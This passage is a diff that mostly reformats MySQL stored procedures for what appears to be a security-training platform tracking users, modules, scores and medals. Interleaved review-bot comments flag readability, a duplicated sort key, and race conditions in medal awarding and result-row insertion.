-CREATE PROCEDURE `core`.`playerUpdateClassToNull`(IN theUserId VARCHAR(45))
+CREATE PROCEDURE `core`.`playerUpdateClassToNull` (IN theUserId VARCHAR(45))
BEGIN
- COMMIT;
- UPDATE users
- SET classId = NULL
+COMMIT;
+UPDATE users SET
+ classId = NULL
WHERE userId = theUserId
- AND userRole = 'player';
- COMMIT;
- SELECT userName
- FROM users
+ AND userRole = 'player';
+COMMIT;
+SELECT userName FROM users
WHERE userId = theUserId
- AND classId IS NULL
- AND userRole = 'player';
+ AND classId IS NULL
+ AND userRole = 'player';
END
-- $$
-- DELIMITER ;
@@ -639,15 +609,14 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userUpdateRole`(IN theUserId VARCHAR(64), IN theNewRole VARCHAR(32))
+CREATE PROCEDURE `core`.`userUpdateRole` (IN theUserId VARCHAR(64), IN theNewRole VARCHAR(32))
BEGIN
- COMMIT;
- UPDATE users
- SET userRole = theNewRole
+COMMIT;
+UPDATE users SET
+ userRole = theNewRole
WHERE userId = theUserId;
- COMMIT;
- SELECT userName
- FROM users
+COMMIT;
+SELECT userName FROM users
WHERE userId = theUserId;
END
-- $$
@@ -658,13 +627,12 @@ END
-- -----------------------------------------------------
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`adminFindById`(IN adminId VARCHAR(64))
+CREATE PROCEDURE `core`.`adminFindById` (IN adminId VARCHAR(64))
BEGIN
- COMMIT;
- SELECT userName
- FROM users
+COMMIT;
+SELECT userName FROM users
WHERE userId = adminId
- AND userRole = 'admin';
+ AND userRole = 'admin';
END
-- $$
-- DELIMITER ;
@@ -674,11 +642,10 @@ END
-- -----------------------------------------------------
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`adminGetAll`()
+CREATE PROCEDURE `core`.`adminGetAll` ()
BEGIN
- COMMIT;
- SELECT userId, userName, userAddress
- FROM users
+COMMIT;
+SELECT userId, userName, userAddress FROM users
WHERE userRole = 'admin'
ORDER BY userName;
END
@@ -691,55 +658,47 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleCreate`(IN theModuleName VARCHAR(64), theModuleType VARCHAR(16),
- theModuleCategory VARCHAR(64), isHardcodedKey BOOLEAN,
- theModuleSolution VARCHAR(191))
+CREATE PROCEDURE `core`.`moduleCreate` (IN theModuleName VARCHAR(64), theModuleType VARCHAR(16), theModuleCategory VARCHAR(64), isHardcodedKey BOOLEAN, theModuleSolution VARCHAR(191))
BEGIN
- DECLARE theId VARCHAR(64);
- DECLARE theDate DATETIME;
- DECLARE theLangPointer VARCHAR(64);
- DECLARE theCategoryLangPointer VARCHAR(64);
- COMMIT;
- SELECT NOW()
- FROM DUAL
+DECLARE theId VARCHAR(64);
+DECLARE theDate DATETIME;
+DECLARE theLangPointer VARCHAR(64);
+DECLARE theCategoryLangPointer VARCHAR(64);
+COMMIT;
+SELECT NOW() FROM DUAL
INTO theDate;
- SELECT REPLACE(LOWER(theModuleName), ' ', '.')
- FROM DUAL
- INTO theLangPointer;
- SELECT REPLACE(LOWER(theModuleCategory), ' ', '.')
- FROM DUAL
- INTO theCategoryLangPointer;
- IF (theModuleSolution IS NULL) THEN
- SELECT SHA2(theDate, 256)
- FROM DUAL
+SELECT REPLACE(LOWER(theModuleName), ' ', '.') FROM DUAL
+ INTO theLangPointer;
+SELECT REPLACE(LOWER(theModuleCategory), ' ', '.') FROM DUAL
+ INTO theCategoryLangPointer;
+IF (theModuleSolution IS NULL) THEN
+ SELECT SHA2(theDate, 256) FROM DUAL
INTO theModuleSolution;
- END IF;
- IF (isHardcodedKey IS NULL) THEN
- SELECT TRUE
- FROM DUAL
+END IF;
+IF (isHardcodedKey IS NULL) THEN
+ SELECT TRUE FROM DUAL
INTO isHardcodedKey;
- END IF;
- IF (theModuleType = 'lesson' OR theModuleType = 'challenge') THEN
- -- Increment sequence for users table
- UPDATE sequence
- SET currVal = currVal + 1
+END IF;
+IF (theModuleType = 'lesson' OR theModuleType = 'challenge') THEN
+ -- Increment sequence for users table
+ UPDATE sequence SET
+ currVal = currVal + 1
WHERE tableName = 'modules';
- COMMIT;
- SELECT SHA(CONCAT(currVal, tableName, theDate, theModuleName))
- FROM sequence
+ COMMIT;
+ SELECT SHA(CONCAT(currVal, tableName, theDate, theModuleName)) FROM sequence
WHERE tableName = 'modules'
INTO theId;
- INSERT INTO modules (moduleId, moduleName, moduleNameLangPointer, moduleType, moduleCategory,
- moduleCategoryLangPointer, moduleResult, moduleHash, hardcodedKey)
- VALUES (theId, theModuleName, theLangPointer, theModuleType, theModuleCategory, theCategoryLangPointer,
- theModuleSolution, SHA2(CONCAT(theModuleName, theId), 256), isHardcodedKey);
- COMMIT;
- SELECT moduleId, moduleHash, moduleNameLangPointer, moduleCategoryLangPointer
- FROM modules
+ INSERT INTO modules (
+ moduleId, moduleName, moduleNameLangPointer, moduleType, moduleCategory, moduleCategoryLangPointer, moduleResult, moduleHash, hardcodedKey
+ )VALUES(
+ theId, theModuleName, theLangPointer, theModuleType, theModuleCategory, theCategoryLangPointer ,theModuleSolution, SHA2(CONCAT(theModuleName, theId), 256), isHardcodedKey
+ );
+ COMMIT;
+ SELECT moduleId, moduleHash, moduleNameLangPointer, moduleCategoryLangPointer FROM modules
WHERE moduleId = theId;
- ELSE
- SELECT 'ERROR: Invalid module type submited' FROM DUAL;
- END IF;
+ELSE
+ SELECT 'ERROR: Invalid module type submited' FROM DUAL;
+END IF;
END
@@ -753,39 +712,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`getMyModules`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`getMyModules` (IN theUserId VARCHAR(64))
BEGIN
- (SELECT moduleNameLangPointer,
- moduleCategoryLangPointer,
- moduleId,
- finishTime,
- moduleType,
- scoreValue,
- incrementalRank,
- scored,
- medalEarned
- FROM modules
- LEFT JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleStatus = 'open')
- UNION
- (SELECT moduleNameLangPointer,
- moduleCategoryLangPointer,
- moduleId,
- null,
- moduleType,
- scoreValue,
- incrementalRank,
- null,
- null
- FROM modules
- WHERE moduleId NOT IN (SELECT moduleId
- FROM modules
- JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleStatus = 'open')
- AND moduleStatus = 'open')
- ORDER BY incrementalRank;
+(SELECT moduleNameLangPointer, moduleCategoryLangPointer, moduleId, finishTime, moduleType, scoreValue, incrementalRank, scored, medalEarned
+FROM modules LEFT JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'open') UNION (SELECT moduleNameLangPointer, moduleCategoryLangPointer, moduleId, null, moduleType, scoreValue, incrementalRank, null, null FROM modules WHERE moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'open') AND moduleStatus = 'open') ORDER BY incrementalRank;
END
-- $$
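Review bot: The `getMyModules` query is now a single line several hundred characters long, which makes the per-user filter `userId = theUserId` and the `moduleStatus = 'open'` checks in each UNION branch and in the `NOT IN` subquery hard to review. The same collapse is applied to `moduleAllInfo` and `lessonInfo` in the next two hunks. Keep one clause per line as the removed version did, so that a future change to one branch's filter shows up as a one-line diff. Only layout changes are visible here, not behaviour.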
@@ -798,26 +728,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleAllInfo`(IN theType VARCHAR(64), IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleAllInfo` (IN theType VARCHAR(64), IN theUserId VARCHAR(64))
BEGIN
- (SELECT moduleNameLangPointer, moduleCategoryLangPointer, moduleId, finishTime
- FROM modules
- LEFT JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleType = theType
- AND moduleStatus = 'open')
- UNION
- (SELECT moduleNameLangPointer, moduleCategoryLangPointer, moduleId, null
- FROM modules
- WHERE moduleId NOT IN (SELECT moduleId
- FROM modules
- JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleType = theType
- AND moduleStatus = 'open')
- AND moduleType = theType
- AND moduleStatus = 'open')
- ORDER BY moduleCategoryLangPointer, moduleNameLangPointer;
+(SELECT moduleNameLangPointer, moduleCategoryLangPointer, moduleId, finishTime
+FROM modules LEFT JOIN results USING (moduleId) WHERE userId = theUserId AND moduleType = theType AND moduleStatus = 'open') UNION (SELECT moduleNameLangPointer, moduleCategoryLangPointer, moduleId, null FROM modules WHERE moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId AND moduleType = theType AND moduleStatus = 'open') AND moduleType = theType AND moduleStatus = 'open') ORDER BY moduleCategoryLangPointer, moduleNameLangPointer;
END
-- $$
@@ -830,26 +744,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`lessonInfo`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`lessonInfo` (IN theUserId VARCHAR(64))
BEGIN
- (SELECT moduleNameLangPointer, moduleCategory, moduleId, finishTime
- FROM modules
- LEFT JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleType = 'lesson'
- AND moduleStatus = 'open')
- UNION
- (SELECT moduleNameLangPointer, moduleCategory, moduleId, null
- FROM modules
- WHERE moduleId NOT IN (SELECT moduleId
- FROM modules
- JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleType = 'lesson'
- AND moduleStatus = 'open')
- AND moduleType = 'lesson'
- AND moduleStatus = 'open')
- ORDER BY moduleNameLangPointer, moduleCategory, moduleNameLangPointer;
+(SELECT moduleNameLangPointer, moduleCategory, moduleId, finishTime
+FROM modules LEFT JOIN results USING (moduleId) WHERE userId = theUserId AND moduleType = 'lesson' AND moduleStatus = 'open') UNION (SELECT moduleNameLangPointer, moduleCategory, moduleId, null FROM modules WHERE moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId AND moduleType = 'lesson' AND moduleStatus = 'open') AND moduleType = 'lesson' AND moduleStatus = 'open') ORDER BY moduleNameLangPointer, moduleCategory, moduleNameLangPointer;
END
-- $$
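Review bot: The `ORDER BY moduleNameLangPointer, moduleCategory, moduleNameLangPointer` that ends the new `lessonInfo` query names `moduleNameLangPointer` twice, and the second occurrence cannot affect the ordering. `moduleAllInfo` sorts by category first, so this may have been meant as `ORDER BY moduleCategory, moduleNameLangPointer`; if name-first ordering is intended, drop the trailing key. The duplicate is carried over unchanged from the removed side.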
@@ -862,13 +760,12 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetResult`(IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleGetResult` (IN theModuleId VARCHAR(64))
BEGIN
- COMMIT;
- SELECT moduleName, moduleResult
- FROM modules
+COMMIT;
+SELECT moduleName, moduleResult FROM modules
WHERE moduleId = theModuleId
- AND moduleResult IS NOT NULL;
+ AND moduleResult IS NOT NULL;
END
-- $$
@@ -881,11 +778,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetNameLocale`(IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleGetNameLocale` (IN theModuleId VARCHAR(64))
BEGIN
- COMMIT;
- SELECT moduleNameLangPointer, moduleName
- FROM modules
+COMMIT;
+SELECT moduleNameLangPointer, moduleName FROM modules
WHERE moduleId = theModuleId;
END
@@ -898,217 +794,165 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userUpdateResult`(IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64), IN theBefore INT,
- IN theAfter INT, IN theDifficulty INT, IN givePoints BOOLEAN,
- IN theAdditionalInfo LONGTEXT)
+CREATE PROCEDURE `core`.`userUpdateResult` (IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64), IN theBefore INT, IN theAfter INT, IN theDifficulty INT, IN givePoints BOOLEAN, IN theAdditionalInfo LONGTEXT)
BEGIN
- DECLARE theDate TIMESTAMP;
- DECLARE theClassId VARCHAR(64);
- DECLARE theMedalEarned VARCHAR(32);
- DECLARE theBonus INT;
- DECLARE totalScore INT;
- DECLARE medalInfo INT; -- Used to find out if there is a medal available
- DECLARE goldMedalInfo INT;
- DECLARE silverMedalInfo INT;
- DECLARE bronzeMedalInfo INT;
- DECLARE medalRow INT;
- COMMIT;
+DECLARE theDate TIMESTAMP;
+DECLARE theClassId VARCHAR(64);
+DECLARE theMedalEarned VARCHAR(32);
+DECLARE theBonus INT;
+DECLARE totalScore INT;
+DECLARE medalInfo INT; -- Used to find out if there is a medal available
+DECLARE goldMedalInfo INT;
+DECLARE silverMedalInfo INT;
+DECLARE bronzeMedalInfo INT;
+DECLARE medalRow INT;
+COMMIT;
- SELECT NOW()
- FROM DUAL
+SELECT NOW() FROM DUAL
INTO theDate;
-
- IF (givePoints) THEN
- -- Does this Module/class combo exist in the DB?
- SELECT classId FROM users WHERE userid = theUserId INTO theClassId;
- IF (theClassId IS NULL) THEN
- SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId IS NULL INTO medalRow;
- ELSE
- SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId INTO medalRow;
- END IF;
- IF (medalRow < 1) THEN
- INSERT INTO medals (classId, moduleId) VALUES (theClassId, theModuleId);
- END IF;
- COMMIT;
-
- -- Get current bonus and decrement the bonus value
- SELECT 0 FROM DUAL INTO totalScore;
-
- IF (theClassId IS NULL) THEN
- SELECT scoreBonus FROM medals WHERE moduleId = theModuleId AND classId IS NULL INTO theBonus;
- ELSE
- SELECT scoreBonus FROM medals WHERE moduleId = theModuleId AND classId = theClassId INTO theBonus;
- END IF;
- IF (theBonus > 0) THEN
- SELECT (totalScore + theBonus)
- FROM DUAL
- INTO totalScore;
- IF (theClassId IS NULL) THEN
- UPDATE medals SET scoreBonus = scoreBonus - 1 WHERE moduleId = theModuleId AND classId IS NULL;
- ELSE
- UPDATE medals SET scoreBonus = scoreBonus - 1 WHERE moduleId = theModuleId AND classId = theClassId;
- END IF;
- COMMIT;
- END IF;
-
- -- Medal Available?
- IF (theClassId IS NULL) THEN
- SELECT count(moduleId)
- FROM medals
- WHERE moduleId = theModuleId
- AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE)
- AND classId IS NULL
- INTO medalInfo;
- ELSE
- SELECT count(moduleId)
- FROM medals
- WHERE moduleId = theModuleId
- AND classId = theClassId
- AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE)
- INTO medalInfo;
- END IF;
- COMMIT;
-
- IF (medalInfo > 0) THEN
- IF (theClassId IS NULL) THEN
- SELECT count(moduleId)
- FROM medals
- WHERE moduleId = theModuleId
- AND goldMedalAvailable = TRUE
- AND classId IS NULL
- INTO goldMedalInfo;
- ELSE
- SELECT count(moduleId)
- FROM medals
- WHERE moduleId = theModuleId
- AND classId = theClassId
- AND goldMedalAvailable = TRUE
- INTO goldMedalInfo;
- END IF;
- IF (goldMedalInfo > 0) THEN
- UPDATE users SET goldMedalCount = goldMedalCount + 1 WHERE userId = theUserId;
- IF (theClassId IS NULL) THEN
- UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
- ELSE
- UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
- END IF;
- COMMIT;
- ELSE
- IF (theClassId IS NULL) THEN
- SELECT count(moduleId)
- FROM medals
- WHERE moduleId = theModuleId
- AND silverMedalAvailable = TRUE
- AND classId IS NULL
- INTO silverMedalInfo;
- ELSE
- SELECT count(moduleId)
- FROM medals
- WHERE moduleId = theModuleId
- AND classId = theClassId
- AND silverMedalAvailable = TRUE
- INTO silverMedalInfo;
- END IF;
- IF (silverMedalInfo > 0) THEN
- UPDATE users SET silverMedalCount = silverMedalCount + 1 WHERE userId = theUserId;
- IF (theClassId IS NULL) THEN
- UPDATE medals SET silverMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
- ELSE
- UPDATE medals
- SET silverMedalAvailable = FALSE
- WHERE moduleId = theModuleId AND classId = theClassId;
- END IF;
- COMMIT;
- ELSE
- IF (theClassId IS NULL) THEN
- SELECT count(moduleId)
- FROM medals
- WHERE moduleId = theModuleId
- AND bronzeMedalAvailable = TRUE
- AND classId IS NULL
- INTO bronzeMedalInfo;
- ELSE
- SELECT count(moduleId)
- FROM medals
- WHERE moduleId = theModuleId
- AND classId = theClassId
- AND bronzeMedalAvailable = TRUE
- INTO bronzeMedalInfo;
- END IF;
- IF (bronzeMedalInfo > 0) THEN
- UPDATE users SET bronzeMedalCount = bronzeMedalCount + 1 WHERE userId = theUserId;
- IF (theClassId IS NULL) THEN
- UPDATE medals
- SET bronzeMedalAvailable = FALSE
- WHERE moduleId = theModuleId AND classId IS NULL;
- ELSE
- UPDATE medals
- SET bronzeMedalAvailable = FALSE
- WHERE moduleId = theModuleId AND classId = theClassId;
- END IF;
- COMMIT;
- END IF;
- END IF;
- END IF;
- END IF;
-
- -- Get the type of Medal the user might have earned
- IF (medalInfo <= 0) THEN
- SELECT "none" FROM DUAL INTO theMedalEarned;
- ELSE
- IF (goldMedalInfo > 0) THEN
- SELECT "gold" FROM DUAL INTO theMedalEarned;
- ELSE
- IF (silverMedalInfo > 0) THEN
- SELECT "silver" FROM DUAL INTO theMedalEarned;
- ELSE
- IF (bronzeMedalInfo > 0) THEN
- SELECT "bronze" FROM DUAL INTO theMedalEarned;
- END IF;
- END IF;
- END IF;
- END IF;
-
- -- Get the Score value for the level
- SELECT (totalScore + scoreValue)
- FROM modules
- WHERE moduleId = theModuleId
- INTO totalScore;
-
- -- Update users score
- UPDATE users
- SET userScore = userScore + totalScore
- WHERE userId = theUserId;
- COMMIT;
-
- ELSE
- -- Don't award points or medals, just record module as completed
- SET totalScore = 0;
- SELECT "none" FROM DUAL INTO theMedalEarned;
-
- END IF;
+
+IF (givePoints) THEN
+ -- Does this Module/class combo exist in the DB?
+ SELECT classId FROM users WHERE userid = theUserId INTO theClassId;
+ IF (theClassId IS NULL) THEN
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId IS NULL INTO medalRow;
+ ELSE
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId INTO medalRow;
+ END IF;
+ IF (medalRow < 1) THEN
+ INSERT INTO medals (classId, moduleId) VALUES (theClassId, theModuleId);
+ END IF;
+ COMMIT;
+
+ -- Get current bonus and decrement the bonus value
+ SELECT 0 FROM DUAL INTO totalScore;
+
+ IF (theClassId IS NULL) THEN
+ SELECT scoreBonus FROM medals WHERE moduleId = theModuleId AND classId IS NULL INTO theBonus;
+ ELSE
+ SELECT scoreBonus FROM medals WHERE moduleId = theModuleId AND classId = theClassId INTO theBonus;
+ END IF;
+ IF (theBonus > 0) THEN
+ SELECT (totalScore + theBonus) FROM DUAL
+ INTO totalScore;
+ IF (theClassId IS NULL) THEN
+ UPDATE medals SET scoreBonus = scoreBonus - 1 WHERE moduleId = theModuleId AND classId IS NULL;
+ ELSE
+ UPDATE medals SET scoreBonus = scoreBonus - 1 WHERE moduleId = theModuleId AND classId = theClassId;
+ END IF;
+ COMMIT;
+ END IF;
+
+ -- Medal Available?
+ IF (theClassId IS NULL) THEN
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE) AND classId IS NULL INTO medalInfo;
+ ELSE
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE) INTO medalInfo;
+ END IF;
+ COMMIT;
+
+ IF (medalInfo > 0) THEN
+ IF (theClassId IS NULL) THEN
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND goldMedalAvailable = TRUE AND classId IS NULL INTO goldMedalInfo;
+ ELSE
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND goldMedalAvailable = TRUE INTO goldMedalInfo;
+ END IF;
+ IF (goldMedalInfo > 0) THEN
+ UPDATE users SET goldMedalCount = goldMedalCount + 1 WHERE userId = theUserId;
+ IF (theClassId IS NULL) THEN
+ UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
+ ELSE
+ UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
+ END IF;
+ COMMIT;
+ ELSE
+ IF (theClassId IS NULL) THEN
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND silverMedalAvailable = TRUE AND classId IS NULL INTO silverMedalInfo;
+ ELSE
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND silverMedalAvailable = TRUE INTO silverMedalInfo;
+ END IF;
+ IF (silverMedalInfo > 0) THEN
+ UPDATE users SET silverMedalCount = silverMedalCount + 1 WHERE userId = theUserId;
+ IF (theClassId IS NULL) THEN
+ UPDATE medals SET silverMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
+ ELSE
+ UPDATE medals SET silverMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
+ END IF;
+ COMMIT;
+ ELSE
+ IF (theClassId IS NULL) THEN
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND bronzeMedalAvailable = TRUE AND classId IS NULL INTO bronzeMedalInfo;
+ ELSE
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND bronzeMedalAvailable = TRUE INTO bronzeMedalInfo;
+ END IF;
+ IF (bronzeMedalInfo > 0) THEN
+ UPDATE users SET bronzeMedalCount = bronzeMedalCount + 1 WHERE userId = theUserId;
+ IF (theClassId IS NULL) THEN
+ UPDATE medals SET bronzeMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
+ ELSE
+ UPDATE medals SET bronzeMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
+ END IF;
+ COMMIT;
+ END IF;
+ END IF;
+ END IF;
+ END IF;
+
+ -- Get the type of Medal the user might have earned
+ IF (medalInfo <= 0) THEN
+ SELECT "none" FROM DUAL INTO theMedalEarned;
+ ELSE
+ IF (goldMedalInfo > 0) THEN
+ SELECT "gold" FROM DUAL INTO theMedalEarned;
+ ELSE
+ IF (silverMedalInfo > 0) THEN
+ SELECT "silver" FROM DUAL INTO theMedalEarned;
+ ELSE
+ IF (bronzeMedalInfo > 0) THEN
+ SELECT "bronze" FROM DUAL INTO theMedalEarned;
+ END IF;
+ END IF;
+ END IF;
+ END IF;
+
+ -- Get the Score value for the level
+ SELECT (totalScore + scoreValue) FROM modules
+ WHERE moduleId = theModuleId
+ INTO totalScore;
+
+ -- Update users score
+ UPDATE users SET
+ userScore = userScore + totalScore
+ WHERE userId = theUserId;
+ COMMIT;
+
+ELSE
+ -- Don't award points or medals, just record module as completed
+ SET totalScore=0;
+ SELECT "none" FROM DUAL INTO theMedalEarned;
+
+END IF;
-- Update result row
- UPDATE results
- SET finishTime = theDate,
- `knowledgeBefore` = theBefore,
- `knowledgeAfter` = theAfter,
- `difficulty` = theDifficulty,
- `resultSubmission` = theAdditionalInfo,
- `scored` = totalScore,
- `medalEarned` = theMedalEarned
+UPDATE results SET
+ finishTime = theDate,
+ `knowledgeBefore` = theBefore,
+ `knowledgeAfter` = theAfter,
+ `difficulty` = theDifficulty,
+ `resultSubmission` = theAdditionalInfo,
+ `scored` = totalScore,
+ `medalEarned` = theMedalEarned
WHERE startTime IS NOT NULL
- AND finishTime IS NULL
- AND userId = theUserId
- AND moduleId = theModuleId;
- COMMIT;
- SELECT moduleName
- FROM modules
- JOIN results USING (moduleId)
+ AND finishTime IS NULL
+ AND userId = theUserId
+ AND moduleId = theModuleId;
+COMMIT;
+SELECT moduleName FROM modules
+ JOIN results USING (moduleId)
WHERE startTime IS NOT NULL
- AND finishTime IS NOT NULL
- AND userId = theUserId
- AND moduleId = theModuleId;
+ AND finishTime IS NOT NULL
+ AND userId = theUserId
+ AND moduleId = theModuleId;
END
-- $$
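Review bot: The medal and bonus award in `userUpdateResult` is check-then-act: each `SELECT count(moduleId) ... INTO goldMedalInfo` is followed by a separate `UPDATE medals SET goldMedalAvailable = FALSE ...`, with `COMMIT`s in between, so two submissions for the same module and class that interleave can both read the medal as available and both increment `goldMedalCount`. The same pattern applies to `scoreBonus`, which is read into `theBonus` and decremented in a later statement. Claiming the medal in one statement and testing the affected-row count closes the window, e.g. `UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId <=> theClassId AND goldMedalAvailable = TRUE;` followed by `IF (ROW_COUNT() > 0) THEN`; the null-safe `<=>` would also remove the duplicated `classId IS NULL` branches. Whether callers serialise these calls is not visible in this hunk.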
@@ -1121,30 +965,27 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetHash`(IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleGetHash` (IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64))
BEGIN
- DECLARE theDate DATETIME;
- DECLARE tempInt INT;
- COMMIT;
- SELECT NOW()
- FROM DUAL
+DECLARE theDate DATETIME;
+DECLARE tempInt INT;
+COMMIT;
+SELECT NOW() FROM DUAL
INTO theDate;
- SELECT COUNT(*)
- FROM results
+SELECT COUNT(*) FROM results
WHERE userId = theUserId
- AND moduleId = theModuleId
- AND startTime IS NOT NULL
+ AND moduleId = theModuleId
+ AND startTime IS NOT NULL
INTO tempInt;
- IF (tempInt = 0) THEN
- INSERT INTO results
- (moduleId, userId, startTime)
- VALUES (theModuleId, theUserId, theDate);
- COMMIT;
- END IF;
- SELECT moduleHash, moduleCategory, moduleType
- FROM modules
- WHERE moduleId = theModuleId
- AND moduleStatus = 'open';
+IF(tempInt = 0) THEN
+ INSERT INTO results
+ (moduleId, userId, startTime)
+ VALUES
+ (theModuleId, theUserId, theDate);
+ COMMIT;
+END IF;
+SELECT moduleHash, moduleCategory, moduleType FROM modules
+ WHERE moduleId = theModuleId AND moduleStatus = 'open';
END
-- $$
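Review bot: `moduleGetHash` counts existing `results` rows into `tempInt` and only then inserts, so two concurrent requests from the same user for the same module can both see `tempInt = 0` and insert two start rows. `userUpdateResult` later updates every row matching `userId` and `moduleId`, so such duplicates would be carried along silently. A unique key on `(userId, moduleId)` together with `INSERT IGNORE INTO results (moduleId, userId, startTime) VALUES (theModuleId, theUserId, theDate);` would make the start record idempotent; whether such a key already exists in the schema is not visible here.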
@@ -1156,11 +997,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetResultFromHash`(IN theHash VARCHAR(191))
+CREATE PROCEDURE `core`.`moduleGetResultFromHash` (IN theHash VARCHAR(191))
BEGIN
- COMMIT;
- SELECT moduleResult
- FROM modules
+COMMIT;
+SELECT moduleResult FROM modules
WHERE moduleHash = theHash;
END
@@ -1173,15 +1013,14 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`resultMessageByClass`(IN theClassId VARCHAR(64), IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`resultMessageByClass` (IN theClassId VARCHAR(64), IN theModuleId VARCHAR(64))
BEGIN
- COMMIT;
- SELECT userName, resultSubmission
- FROM results
- JOIN users USING (userId)
- JOIN class USING (classId)
+COMMIT;
+SELECT userName, resultSubmission FROM results
+ JOIN users USING (userId)
+ JOIN class USING (classId)
WHERE classId = theClassId
- AND moduleId = theModuleId;
+ AND moduleId = theModuleId;
END
-- $$
@@ -1193,15 +1032,14 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`resultMessageSet`(IN theMessage VARCHAR(128), IN theUserId VARCHAR(64),
- IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`resultMessageSet` (IN theMessage VARCHAR(128), IN theUserId VARCHAR(64), IN theModuleId VARCHAR(64))
BEGIN
- COMMIT;
- UPDATE results
- SET resultSubmission = theMessage
+COMMIT;
+UPDATE results SET
+ resultSubmission = theMessage
WHERE moduleId = theModuleId
- AND userId = theUserId;
- COMMIT;
+ AND userId = theUserId;
+COMMIT;
END
-- $$
@@ -1213,13 +1051,13 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`resultMessagePlus`(IN theModuleId VARCHAR(64), IN theUserId2 VARCHAR(64))
+CREATE PROCEDURE `core`.`resultMessagePlus` (IN theModuleId VARCHAR(64), IN theUserId2 VARCHAR(64))
BEGIN
- UPDATE results
- SET csrfCount = csrfCount + 1
+UPDATE results SET
+ csrfCount = csrfCount + 1
WHERE userId = theUserId2
- AND moduleId = theModuleId;
- COMMIT;
+ AND moduleId = theModuleId;
+COMMIT;
END
-- $$
@@ -1232,14 +1070,13 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`csrfLevelComplete`(IN theModuleId VARCHAR(64), IN theUserId2 VARCHAR(64))
+CREATE PROCEDURE `core`.`csrfLevelComplete` (IN theModuleId VARCHAR(64), IN theUserId2 VARCHAR(64))
BEGIN
- DECLARE temp INT;
- COMMIT;
- SELECT csrfCount
- FROM results
+ DECLARE temp INT;
+COMMIT;
+SELECT csrfCount FROM results
WHERE userId = theUserId2
- AND moduleId = theModuleId;
+ AND moduleId = theModuleId;
END
-- $$
@@ -1252,11 +1089,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetIdFromHash`(IN theHash VARCHAR(191))
